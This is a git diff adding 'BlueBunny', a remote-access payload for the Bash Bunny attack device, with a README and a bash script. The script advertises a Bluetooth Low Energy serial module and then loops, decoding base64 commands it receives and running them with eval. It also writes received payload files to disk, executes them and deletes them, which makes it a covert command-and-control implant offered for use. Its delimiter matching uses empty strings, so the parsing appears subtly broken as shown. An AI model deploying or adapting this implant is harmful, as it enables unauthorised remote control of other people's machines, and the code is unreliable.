diff --git a/payloads/library/remote_access/BlueBunny/README.md b/payloads/library/remote_access/BlueBunny/README.md new file mode 100644 index 00000000..9df8124c --- /dev/null +++ b/payloads/library/remote_access/BlueBunny/README.md @@ -0,0 +1,20 @@ +# BlueBunny +* Author: 90N45 +* Version: 1.0 +* Category: Remote +* Attackmodes: NONE (Custom) + +### Description +Command & Control (C2) solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II. +Send your Bash Bunny all the instructions it needs on-demand over the air. + +### Setup +This payload makes your Bash Bunny usable for the BlueBunny C2 server. For installing the C2 server and controlling your Bash Bunny remotly from it you can follow the instructions form the [BlueBunny GitHub repository](https://github.com/90N45-d3v/BlueBunny) + +### Status +| LED | State | +| --- | --- | +| Magenta solid (SETUP) | Configuring BLE | +| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Bash Bunny can be connected to BlueBunny C2 | + +*Average runtime: 13 seconds* \ No newline at end of file diff --git a/payloads/library/remote_access/BlueBunny/payload.txt b/payloads/library/remote_access/BlueBunny/payload.txt new file mode 100644 index 00000000..e5325aa1 --- /dev/null +++ b/payloads/library/remote_access/BlueBunny/payload.txt @@ -0,0 +1,63 @@ +#!/bin/bash +# +# Title: BlueBunny +# Description: BLE based C2 server for the Bash Bunny Mark II +# Author: 90N45 +# Version: 1.0 +# Category: Remote +# Attackmodes: NONE (Custom) + +LED SETUP + +# Enable serial BLE module +stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost +stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost +sleep 1 + +# Configure BLE module as slave +echo -n -e "AT+ROLE=0" > /dev/ttyS1 +echo -n -e "AT+NAME=BlueBunny" > /dev/ttyS1 +echo -n -e "AT+ADV=1" > /dev/ttyS1 +echo -n -e "AT+RESET" > /dev/ttyS1 + +LED FINISH + +while [[ true ]]; do + # Get incomming data from serial port + data=$(head -1 /dev/ttyS1) + + # Decode base64 encoded data + data=$(echo ${data} | base64 -d) + + # Echo data for debugging + echo "Debugger: ${data}" + + # Single command + if [[ $data =~ "" ]]; then + # Extract command + command=${data#*} + command=${command%%*} + + # Run recieved command + eval "${command}" + fi + + # Payload file + if [[ $data =~ "" ]]; then + # Set payload file name + file="BlueBunnyPayload-${RANDOM}.txt" + + # Extract file content + content=${data#*} + content=${content%%*} + + # Write content to file + printf "${content}" > "${file}"; + + # Run payload + bash $file + + # Remove payload file + rm $file + fi +done \ No newline at end of file